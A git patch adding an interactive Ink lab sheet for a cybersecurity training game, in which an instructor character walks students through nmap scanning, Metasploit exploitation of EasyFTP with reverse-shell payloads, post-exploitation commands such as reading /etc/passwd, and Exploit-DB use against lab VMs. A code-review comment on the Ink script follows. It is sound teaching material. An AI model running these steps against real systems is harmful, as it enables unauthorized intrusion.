From ab96da0731cab7320db4874cdcd9dfafa3918312 Mon Sep 17 00:00:00 2001
From: "Z. Cliffe Schreuders"
Date: Wed, 19 Nov 2025 18:24:26 +0000
Subject: [PATCH] feat: Add GBL exploitation techniques lab sheet

---
 story_design/ink/lab_sheets/exploitation.ink | 893 +++++++++++++++++++
 1 file changed, 893 insertions(+)
 create mode 100644 story_design/ink/lab_sheets/exploitation.ink

diff --git a/story_design/ink/lab_sheets/exploitation.ink b/story_design/ink/lab_sheets/exploitation.ink
new file mode 100644
index 0000000..cf5056a
--- /dev/null
+++ b/story_design/ink/lab_sheets/exploitation.ink
@@ -0,0 +1,893 @@ +// From Scanning to Exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/6_exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR exploitation_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Exploitation Specialist: Welcome back, Agent {player_name}. I'm your instructor for Advanced Exploitation Techniques. + +~ instructor_rapport = 0 +~ exploitation_mastery = 0 + +Exploitation Specialist: This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. + +Exploitation Specialist: You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems. + +Exploitation Specialist: We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process. + +Exploitation Specialist: Remember: this knowledge is for authorized penetration testing and defensive security only. + +~ exploitation_mastery += 10 + +-> exploitation_hub + +=== exploitation_hub === +Exploitation Specialist: What aspect of exploitation would you like to explore? + ++ [Why combine scanning and exploitation?] 
+ -> scanning_to_exploitation ++ [Scanning targets with Nmap] + -> nmap_scanning ++ [Metasploit database and scan import] + -> metasploit_database ++ [Running scans from within msfconsole] + -> msfconsole_scanning ++ [Searching for Metasploit exploits] + -> searching_exploits ++ [Launching Metasploit exploits] + -> launching_exploits ++ [Introduction to Armitage] + -> armitage_intro ++ [Using Armitage for automated hacking] + -> armitage_usage ++ [Vulnerability databases and research] + -> vulnerability_databases ++ [The Exploit Database and searchsploit] + -> exploit_db ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== scanning_to_exploitation === +Exploitation Specialist: After gathering information about a target through footprinting and scanning, you need to know what attacks will work. + +~ instructor_rapport += 5 + +Exploitation Specialist: The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security? + +Exploitation Specialist: Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information. + ++ [What makes a target exploitable?] + Exploitation Specialist: A target is exploitable when it's running vulnerable software that you have an exploit for. + + Exploitation Specialist: For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system. + + Exploitation Specialist: The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack. 
+ + ~ instructor_rapport += 5 + ++ [How do I know what attacks will work?] + Exploitation Specialist: This is where vulnerability databases and exploit frameworks like Metasploit come in. + + Exploitation Specialist: After scanning reveals "Windows 2000 with EasyFTP 1.7.0.11," you can search for known vulnerabilities in those specific versions. + + Exploitation Specialist: Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number. + + Exploitation Specialist: We'll also look at external databases like CVE Details, NVD, and Exploit DB. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== nmap_scanning === +Exploitation Specialist: The first step is thorough scanning to identify your targets and what they're running. + +~ instructor_rapport += 5 + +Exploitation Specialist: For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows. + +Exploitation Specialist: A comprehensive scan would be: nmap -sV 10.X.X.2-3 + +Exploitation Specialist: Where X.X are the second and third octets of your Kali VM's IP address. + ++ [What should I look for in the scan results?] + Exploitation Specialist: Pay attention to several key pieces of information: + + Exploitation Specialist: First, the IP addresses - which host is Linux and which is Windows? + + Exploitation Specialist: Second, what services are running - HTTP, FTP, SSH, IRC? + + Exploitation Specialist: Third, and most importantly, what specific software versions are running. For example: "vsftpd 2.3.4" or "EasyFTP 1.7.0.11" + + Exploitation Specialist: Those specific version numbers are critical for finding applicable exploits. + + ~ instructor_rapport += 5 + ++ [What if the scan takes too long?] + Exploitation Specialist: Windows scans can take several minutes to complete - this is normal. + + Exploitation Specialist: If you want faster results, you can skip OS detection or scan fewer ports. 
+ + Exploitation Specialist: However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port. + + ~ instructor_rapport += 5 + ++ [What if nmap shows ftp with a question mark?] + Exploitation Specialist: If you see "ftp?" in the results, it means Nmap isn't confident about the service identification. + + Exploitation Specialist: This can happen if the service is slow to respond or behaving unusually. + + Exploitation Specialist: Try restarting the Windows server and scanning again. The service should respond properly after a fresh start. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== metasploit_database === +Exploitation Specialist: Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities. + +~ instructor_rapport += 5 + +Exploitation Specialist: This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services. + +Exploitation Specialist: Before using the database, you need to initialize it and start PostgreSQL. + ++ [How do I initialize the Metasploit database?] + Exploitation Specialist: First, reinitialize the database: sudo msfdb reinit + + Exploitation Specialist: Then start PostgreSQL: sudo service postgresql start + + Exploitation Specialist: These commands set up the database that Metasploit will use to store scan results and track compromised hosts. + + Exploitation Specialist: You only need to do this once per session, or after restarting your Kali VM. + + ~ instructor_rapport += 5 + ++ [How do I import Nmap scan results?] + Exploitation Specialist: If you've saved Nmap results in XML format, you can import them: + + Exploitation Specialist: From msfconsole, run: db_import scan_output.xml + + Exploitation Specialist: Metasploit will parse the XML and populate the database with host and service information. 
+ + Exploitation Specialist: You can then query this data with commands like "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [What can I do with the database?] + Exploitation Specialist: Once data is in the database, you can query it intelligently: + + Exploitation Specialist: "hosts" shows all discovered hosts and their operating systems. + + Exploitation Specialist: "services" shows all discovered services across all hosts. + + Exploitation Specialist: "services -p 21" shows only services on port 21 (FTP). + + Exploitation Specialist: "services -p 21 -R" does the same AND automatically sets RHOSTS to target those services! + + Exploitation Specialist: This integration makes targeting much more efficient. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== msfconsole_scanning === +Exploitation Specialist: You can run scans directly from within msfconsole - you don't always need a separate terminal. + +~ instructor_rapport += 5 + +Exploitation Specialist: Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET + +Exploitation Specialist: Even better, you can use db_nmap which scans AND automatically imports results into the database. + ++ [What's the difference between nmap and db_nmap?] + Exploitation Specialist: When you run "nmap" from msfconsole, it just executes Nmap normally. You'd need to manually import the results. + + Exploitation Specialist: When you run "db_nmap", it does the same scan BUT automatically imports results into the Metasploit database. + + Exploitation Specialist: For example: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: This scans all ports with OS and version detection, and the results are immediately available via "hosts" and "services" + + ~ instructor_rapport += 5 + ++ [Does Metasploit have its own scanners?] + Exploitation Specialist: Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap. 
+ + Exploitation Specialist: You can see them with: use auxiliary/scanner/portscan/ (then press TAB) + + Exploitation Specialist: For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: These modules integrate directly with the database and can use multiple threads for faster scanning. + + ~ instructor_rapport += 5 + ++ [How do I use Metasploit's port scanner?] + Exploitation Specialist: First, select the module: use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: Set the target: set RHOSTS TARGET_IP + + Exploitation Specialist: Optionally speed it up: set THREADS 10 + + Exploitation Specialist: Then run it: run + + Exploitation Specialist: Results are automatically stored in the database. You can verify with the "services" command. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== searching_exploits === +Exploitation Specialist: Metasploit's search command is incredibly powerful for finding relevant exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: You can search by platform, service name, CVE number, exploit type, and more. + +Exploitation Specialist: The basic syntax is: search + +Exploitation Specialist: But you can be much more specific with search operators. + ++ [What search operators are available?] + Exploitation Specialist: Here are the main search operators: + + Exploitation Specialist: type: - Specify module type (exploit, auxiliary, post) + + Exploitation Specialist: platform: - Specify platform (Windows, Linux, etc.) + + Exploitation Specialist: cve: - Search by CVE number + + Exploitation Specialist: name: - Search module names + + Exploitation Specialist: For example: search type:exploit platform:Windows + + Exploitation Specialist: Or: search type:exploit cve:2003-0352 + + ~ instructor_rapport += 5 + ++ [How do I search for specific software?] 
+ Exploitation Specialist: Simply include the software name in the search: + + Exploitation Specialist: search easyftp + + Exploitation Specialist: search vsftpd + + Exploitation Specialist: search unreal + + Exploitation Specialist: Metasploit will search module names, descriptions, and references for matches. + + Exploitation Specialist: Look through the results for modules that match your target's version number. + + ~ instructor_rapport += 5 + ++ [Give me some search examples] + Exploitation Specialist: Sure! Here are useful searches: + + Exploitation Specialist: search type:exploit platform:linux + + Exploitation Specialist: search type:exploit cve:2018 + + Exploitation Specialist: search buffer overflow + + Exploitation Specialist: search type:exploit platform:Windows XP + + Exploitation Specialist: search IRC (to find IRC server exploits) + + Exploitation Specialist: Once you find a promising module, use "info exploit/path/to/module" to learn more about it. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== launching_exploits === +Exploitation Specialist: Once you've identified the right exploit module, launching it follows a standard workflow. + +~ instructor_rapport += 5 + +Exploitation Specialist: The process is: select the module, configure options, choose a payload, and launch the attack. + +Exploitation Specialist: Let's walk through a typical exploitation scenario. 
+ ++ [Walk me through exploiting EasyFTP] + Exploitation Specialist: Let me guide you through the complete process: + + Exploitation Specialist: First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: Check required options: show options + + Exploitation Specialist: Set the target: set RHOST TARGET_IP + + Exploitation Specialist: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: Set your IP for the reverse shell: set LHOST YOUR_KALI_IP + + Exploitation Specialist: Optionally check if it's vulnerable: check (though most don't support this) + + Exploitation Specialist: Launch the attack: exploit + + Exploitation Specialist: If successful, you'll get a shell on the target! + + ~ instructor_rapport += 5 + ++ [What payloads should I use?] + Exploitation Specialist: The payload depends on what you want to achieve and what the exploit supports. + + Exploitation Specialist: You can see compatible payloads with: show payloads + + Exploitation Specialist: For Windows targets, common choices include: + + Exploitation Specialist: windows/shell/reverse_tcp - Basic command shell + + Exploitation Specialist: windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features + + Exploitation Specialist: For Linux targets: + + Exploitation Specialist: cmd/unix/reverse - Simple Unix shell + + Exploitation Specialist: linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux + + ~ instructor_rapport += 5 + ++ [What if the exploit doesn't work?] + Exploitation Specialist: First, run "show options" and verify all settings, especially IP addresses. + + Exploitation Specialist: Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST. + + Exploitation Specialist: Try restarting the target VM - sometimes services crash after failed exploit attempts. + + Exploitation Specialist: Verify the target is actually running the vulnerable software at that version. 
+ + Exploitation Specialist: Some exploits are unreliable and may need multiple attempts. + + ~ instructor_rapport += 5 + ++ [What can I do once I have a shell?] + Exploitation Specialist: With a Windows shell, you can run commands like: + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check your privileges) + + Exploitation Specialist: For Linux shells: + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (check current user) + + Exploitation Specialist: We'll cover post-exploitation in more depth in later labs. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_intro === +Exploitation Specialist: Armitage is a free and open source graphical interface for Metasploit with powerful automation features. + +~ instructor_rapport += 5 + +Exploitation Specialist: It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing. + +Exploitation Specialist: Armitage can scan networks, automatically suggest attacks, and visualize compromised systems. + ++ [How is Armitage different from msfconsole?] + Exploitation Specialist: Msfconsole is a command-line interface that gives you complete control and flexibility. + + Exploitation Specialist: Armitage provides a graphical interface that visualizes the network and automates finding attacks. + + Exploitation Specialist: Armitage can look at scan results and automatically suggest which exploits might work against each target. + + Exploitation Specialist: It's particularly useful for beginners or when you want to quickly test multiple targets. + + Exploitation Specialist: However, experienced penetration testers often prefer msfconsole for its power and speed. + + ~ instructor_rapport += 5 + ++ [How do I start Armitage?] 
+ Exploitation Specialist: First, initialize the Metasploit database if you haven't already: + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: Then start Armitage: armitage & + + Exploitation Specialist: The & runs it in the background so you can continue using your terminal. + + Exploitation Specialist: Leave the connection options as default and click "Connect" + + Exploitation Specialist: If prompted, allow Armitage to start the Metasploit RPC server. + + ~ instructor_rapport += 5 + ++ [What does the Armitage interface show?] + Exploitation Specialist: Armitage displays a visual network map showing discovered hosts. + + Exploitation Specialist: Each host is represented by an icon - the icon shows the detected operating system. + + Exploitation Specialist: Compromised systems are shown in red with lightning bolts. + + Exploitation Specialist: You can right-click hosts to see suggested attacks, launch exploits, or interact with shells. + + Exploitation Specialist: The interface makes it easy to see the big picture of a network and what you've compromised. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== armitage_usage === +Exploitation Specialist: Let me walk you through using Armitage to scan and exploit targets. + +~ instructor_rapport += 5 + +Exploitation Specialist: Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow. + ++ [How do I scan with Armitage?] + Exploitation Specialist: Click the "Hosts" menu, select "Nmap Scan", then choose a scan type. + + Exploitation Specialist: "Quick Scan (OS detect)" is a good starting point: nmap -O -sV TARGET + + Exploitation Specialist: Enter the IP address to scan and Armitage will run Nmap. + + Exploitation Specialist: Results are automatically imported into the Metasploit database and displayed visually. 
+ + Exploitation Specialist: Any previously scanned hosts in the database will also appear automatically. + + ~ instructor_rapport += 5 + ++ [How does Armitage suggest attacks?] + Exploitation Specialist: Armitage analyzes the operating system and services detected on each host. + + Exploitation Specialist: First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor + + Exploitation Specialist: Then click: Attacks → Find attacks + + Exploitation Specialist: Armitage will match detected services to available exploits in Metasploit. + + Exploitation Specialist: Right-click a host and select "Attack" to see suggested exploits categorized by service. + + ~ instructor_rapport += 5 + ++ [How do I launch an attack in Armitage?] + Exploitation Specialist: Right-click the target host and select "Attack" + + Exploitation Specialist: Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret + + Exploitation Specialist: Click "Launch" and Armitage will configure and run the exploit. + + Exploitation Specialist: If successful, the host icon turns red showing it's compromised! + + Exploitation Specialist: You can then right-click the compromised host to interact with shells or run post-exploitation modules. + + ~ instructor_rapport += 5 + ++ [How do I interact with a compromised system?] + Exploitation Specialist: Right-click the compromised (red) host. + + Exploitation Specialist: Look for "Meterpreter 1" or "Shell 1" depending on the payload used. + + Exploitation Specialist: Click "Interact" → "Command shell" to open a terminal. + + Exploitation Specialist: You can now run commands like "dir" on Windows or "ls" on Linux. + + Exploitation Specialist: Armitage also has menu options for common post-exploitation tasks. 
+ + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== vulnerability_databases === +Exploitation Specialist: Beyond Metasploit, there are numerous online vulnerability databases you should know about. + +~ instructor_rapport += 5 + +Exploitation Specialist: These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available. + +Exploitation Specialist: Different databases have different focuses and information, so it's worth checking multiple sources. + ++ [What are the main vulnerability databases?] + Exploitation Specialist: Here are the most important ones: + + Exploitation Specialist: CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations. + + Exploitation Specialist: NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository. + + Exploitation Specialist: SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums. + + Exploitation Specialist: Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories. + + ~ instructor_rapport += 5 + ++ [What information do these databases provide?] + Exploitation Specialist: Vulnerability databases typically include: + + Exploitation Specialist: CVE numbers - unique identifiers for each vulnerability. + + Exploitation Specialist: Severity scores (CVSS) - numerical ratings of how serious the vulnerability is. + + Exploitation Specialist: Affected versions - which specific software versions are vulnerable. + + Exploitation Specialist: Technical descriptions of the vulnerability. + + Exploitation Specialist: References to patches, advisories, and sometimes proof-of-concept code. + + Exploitation Specialist: Information about whether exploits exist in the wild. + + ~ instructor_rapport += 5 + ++ [Do all vulnerabilities have CVEs?] + Exploitation Specialist: No! This is an important point. 
+ + Exploitation Specialist: CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs. + + Exploitation Specialist: Sometimes researchers publish vulnerabilities before CVEs are assigned. + + Exploitation Specialist: Some vendors have their own vulnerability identifiers. + + Exploitation Specialist: Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet. + + Exploitation Specialist: This is why checking multiple sources and forums is important. + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== exploit_db === +Exploitation Specialist: The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits. + +~ instructor_rapport += 5 + +Exploitation Specialist: It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code. + +Exploitation Specialist: Kali Linux includes a local copy of the entire database! + ++ [How do I search Exploit-DB online?] + Exploitation Specialist: Visit exploit-db.com and use their search function. + + Exploitation Specialist: You can search by software name, version, platform, or exploit type. + + Exploitation Specialist: Each exploit listing includes the source code, often in Python, C, PHP, or other languages. + + Exploitation Specialist: The database also categorizes exploits by type: remote, local, web application, DoS, etc. + + ~ instructor_rapport += 5 + ++ [How do I use the local Exploit-DB copy?] + Exploitation Specialist: On Kali Linux, exploits are stored in /usr/share/exploitdb/ + + Exploitation Specialist: They're organized by platform: windows, linux, osx, etc. 
+ + Exploitation Specialist: You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv + + ~ instructor_rapport += 5 + ++ [What's searchsploit?] + Exploitation Specialist: Searchsploit is a command-line tool for searching the local Exploit-DB copy. + + Exploitation Specialist: It's much faster and more convenient than manually searching files. + + Exploitation Specialist: Basic usage: searchsploit easyftp + + Exploitation Specialist: You can also use grep on the CSV file: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: To download an exploit to your current directory: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 5 + ++ [How do I use standalone exploits from Exploit-DB?] + Exploitation Specialist: Standalone exploits often require some manual setup: + + Exploitation Specialist: You might need to edit the source code to set the target IP address. + + Exploitation Specialist: Some exploits require compilation (C/C++ code). + + Exploitation Specialist: Python exploits might need specific library dependencies. + + Exploitation Specialist: Read the exploit code comments carefully - they usually explain how to use it. + + Exploitation Specialist: Always understand what an exploit does before running it! + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== commands_reference === +Exploitation Specialist: Let me provide a comprehensive commands reference for this lab. 
+ +~ instructor_rapport += 5 + +Exploitation Specialist: **Initial Scanning:** + +Exploitation Specialist: nmap -sV 10.X.X.2-3 (scan for two servers) + +Exploitation Specialist: nmap -O -sV -p 1-65535 TARGET (comprehensive scan) + +Exploitation Specialist: **Metasploit Database Setup:** + +Exploitation Specialist: sudo msfdb reinit + +Exploitation Specialist: sudo service postgresql start + +Exploitation Specialist: msfconsole (start Metasploit console) + ++ [Show me scanning from msfconsole] + Exploitation Specialist: **Scanning from Msfconsole:** + + Exploitation Specialist: msf > nmap -O -sV TARGET + + Exploitation Specialist: msf > db_nmap -O -sV -p 1-65535 TARGET + + Exploitation Specialist: msf > db_import scan_output.xml + + Exploitation Specialist: **Database Queries:** + + Exploitation Specialist: msf > hosts (show all hosts) + + Exploitation Specialist: msf > services (show all services) + + Exploitation Specialist: msf > services -p 21 (show services on port 21) + + Exploitation Specialist: msf > services -p 21 -R (and set RHOSTS) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit scanning modules] + Exploitation Specialist: **Metasploit Port Scanners:** + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/ (TAB to see options) + + Exploitation Specialist: msf > use auxiliary/scanner/portscan/tcp + + Exploitation Specialist: msf auxiliary(tcp) > set RHOSTS TARGET + + Exploitation Specialist: msf auxiliary(tcp) > set THREADS 10 + + Exploitation Specialist: msf auxiliary(tcp) > run + + Exploitation Specialist: msf auxiliary(tcp) > services + + Exploitation Specialist: msf auxiliary(tcp) > back + + ~ instructor_rapport += 3 + ++ [Show me searching for exploits] + Exploitation Specialist: **Searching for Exploits:** + + Exploitation Specialist: msf > help search + + Exploitation Specialist: msf > search easyftp + + Exploitation Specialist: msf > search type:exploit platform:Windows + + Exploitation Specialist: msf > search type:exploit 
cve:2003-0352 + + Exploitation Specialist: msf > search buffer overflow + + Exploitation Specialist: msf > search type:exploit platform:linux + + Exploitation Specialist: msf > info exploit/windows/ftp/easyftp_cwd_fixret + + ~ instructor_rapport += 3 + ++ [Show me launching exploits] + Exploitation Specialist: **Launching Exploits:** + + Exploitation Specialist: msf > use exploit/windows/ftp/easyftp_cwd_fixret + + Exploitation Specialist: msf exploit(...) > show options + + Exploitation Specialist: msf exploit(...) > set RHOST TARGET_IP + + Exploitation Specialist: msf exploit(...) > show payloads + + Exploitation Specialist: msf exploit(...) > set PAYLOAD windows/shell/reverse_tcp + + Exploitation Specialist: msf exploit(...) > set LHOST YOUR_KALI_IP + + Exploitation Specialist: msf exploit(...) > check (if supported) + + Exploitation Specialist: msf exploit(...) > exploit + + ~ instructor_rapport += 3 + ++ [Show me post-exploitation commands] + Exploitation Specialist: **Post-Exploitation Commands (Windows):** + + Exploitation Specialist: dir C:\ (list files) + + Exploitation Specialist: net user (list user accounts) + + Exploitation Specialist: whoami (check privileges) + + Exploitation Specialist: type C:\path\to\flag.txt (read file) + + Exploitation Specialist: **Post-Exploitation Commands (Linux):** + + Exploitation Specialist: ls -la (list files) + + Exploitation Specialist: cat /etc/passwd (view user accounts) + + Exploitation Specialist: whoami (current user) + + Exploitation Specialist: cat flag (read flag file) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Exploitation Specialist: **Armitage Setup:** + + Exploitation Specialist: sudo msfdb reinit + + Exploitation Specialist: sudo service postgresql start + + Exploitation Specialist: armitage & + + Exploitation Specialist: **Armitage Workflow:** + + Exploitation Specialist: 1. Hosts → Nmap Scan → Quick Scan (OS detect) + + Exploitation Specialist: 2. 
Armitage → Set Exploit Rank → Poor + + Exploitation Specialist: 3. Attacks → Find attacks + + Exploitation Specialist: 4. Right-click host → Attack → select exploit → Launch + + Exploitation Specialist: 5. Right-click compromised host → Interact → Command shell + + ~ instructor_rapport += 3 + ++ [Show me Exploit-DB commands] + Exploitation Specialist: **Exploit Database:** + + Exploitation Specialist: find /usr/share/exploitdb/exploits/windows | less + + Exploitation Specialist: less /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: grep -i "EasyFTP" /usr/share/exploitdb/files_exploits.csv + + Exploitation Specialist: searchsploit easyftp + + Exploitation Specialist: searchsploit -m windows/remote/11539.py + + ~ instructor_rapport += 3 + +- -> exploitation_hub + +=== challenge_tips === +Exploitation Specialist: Let me give you practical tips for succeeding in the exploitation challenges. + +~ instructor_rapport += 5 + +Exploitation Specialist: **Finding Vulnerable Services:** + +Exploitation Specialist: Start with a comprehensive scan: nmap -sV -p 1-65535 TARGET + +Exploitation Specialist: Pay close attention to service versions - specific version numbers are key to finding exploits. + +Exploitation Specialist: Import results into Metasploit for easier targeting: db_nmap -sV TARGET + ++ [Tips for exploiting the Windows server?] + Exploitation Specialist: The Windows server is running EasyFTP with a known vulnerability. + + Exploitation Specialist: Search for it: search easyftp + + Exploitation Specialist: Look for the module ending in "cwd_fixret" + + Exploitation Specialist: Use a reverse shell payload since it's more reliable: windows/shell/reverse_tcp + + Exploitation Specialist: Make sure to set LHOST to YOUR Kali IP (the host-only network address). + + Exploitation Specialist: If the exploit fails, restart the Windows VM and try again. + + ~ instructor_rapport += 5 + ++ [Tips for exploiting the Linux server?] 
+ Exploitation Specialist: The Linux server has multiple potentially vulnerable services. + + Exploitation Specialist: Scan all ports to find everything running: nmap -sV -p- TARGET + + Exploitation Specialist: Look for services like vsftpd, IRC, or other network services. + + Exploitation Specialist: Search Metasploit for exploits matching those services. + + Exploitation Specialist: Remember to use a Unix reverse shell payload: cmd/unix/reverse + + Exploitation Specialist: Some Linux exploits are more reliable than others - you may need to try a few. + + ~ instructor_rapport += 5 + ++ [Tips for using Armitage?] + Exploitation Specialist: Armitage is great for beginners because it suggests attacks automatically. + + Exploitation Specialist: Make sure you set the exploit rank to "Poor" or you'll miss some exploits. + + Exploitation Specialist: Don't just click the first suggested attack - read the module info to understand what it does. + + Exploitation Specialist: Armitage may prompt for your Kali IP address - use the host-only network IP, not 127.0.0.1. + + Exploitation Specialist: If Armitage seems to hang, check the console tab at the bottom for error messages. + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Exploitation Specialist: Always verify your IP addresses with "show options" before running exploits. + + Exploitation Specialist: RHOST should be the TARGET's IP. LHOST should be YOUR Kali IP. + + Exploitation Specialist: If services stop responding, restart the target VM - exploits often crash vulnerable services. + + Exploitation Specialist: After successfully exploiting a service once, you'll need to restart the VM to exploit it again. + + Exploitation Specialist: Be patient - some exploits take time to establish connections. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Exploitation Specialist: For the Windows server, look on a user's Desktop. 
+ + Exploitation Specialist: Navigate with: cd C:\Users or cd C:\Documents and Settings + + Exploitation Specialist: List directories with: dir + + Exploitation Specialist: Read flag files with: type flag.txt + + Exploitation Specialist: For the Linux server, flags are typically in user home directories. + + Exploitation Specialist: Navigate with: cd /home + + Exploitation Specialist: List directories with: ls -la + + Exploitation Specialist: Read flags with: cat flag + + ~ instructor_rapport += 5 + +- -> exploitation_hub + +=== ready_for_practice === +Exploitation Specialist: Excellent! You're ready to start practical exploitation. + +~ instructor_rapport += 10 +~ exploitation_mastery += 10 + +Exploitation Specialist: You now understand how to move from scanning to exploitation - the core of penetration testing. + +Exploitation Specialist: Remember: these techniques are powerful. Use them only for authorized security testing and defensive purposes. + +Exploitation Specialist: In this lab, you'll scan two servers, identify vulnerable services, and exploit them to gain access. + ++ [Any final advice before I start?] + Exploitation Specialist: Be methodical. Scan thoroughly, document what you find, research vulnerabilities, then exploit. + + Exploitation Specialist: Don't rush. Take time to understand what each exploit does and why it works. + + Exploitation Specialist: If something doesn't work, check your settings, restart the target, and try again. + + Exploitation Specialist: Try both msfconsole and Armitage to see which you prefer. + + Exploitation Specialist: Most importantly: always verify you're targeting the right system and have authorization! + + Exploitation Specialist: Good luck, Agent {player_name}. Time to put your skills to the test. + + ~ instructor_rapport += 10 + +- -> exploitation_hub + +-> END
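Review bot: the `start` knot unconditionally resets both counters with `~ instructor_rapport = 0` and `~ exploitation_mastery = 0` immediately after they are declared as "Global persistent state", so any value carried over from an earlier visit is thrown away; either drop the two reset lines or guard them so they only run on the first visit. Related: `exploitation_mastery` is incremented in `start` and `ready_for_practice` but never read or surfaced anywhere in the file, so neither the story nor the host can act on it, and the trailing `-> END` after the `- -> exploitation_hub` gather in `ready_for_practice` is unreachable. Finally, `EXTERNAL player_name` declares an external function in Ink rather than a variable; if the host supplies the agent's name as a value, it should be declared with `VAR player_name = ""` and set from the runtime, or bound as a function and called as `{player_name()}`.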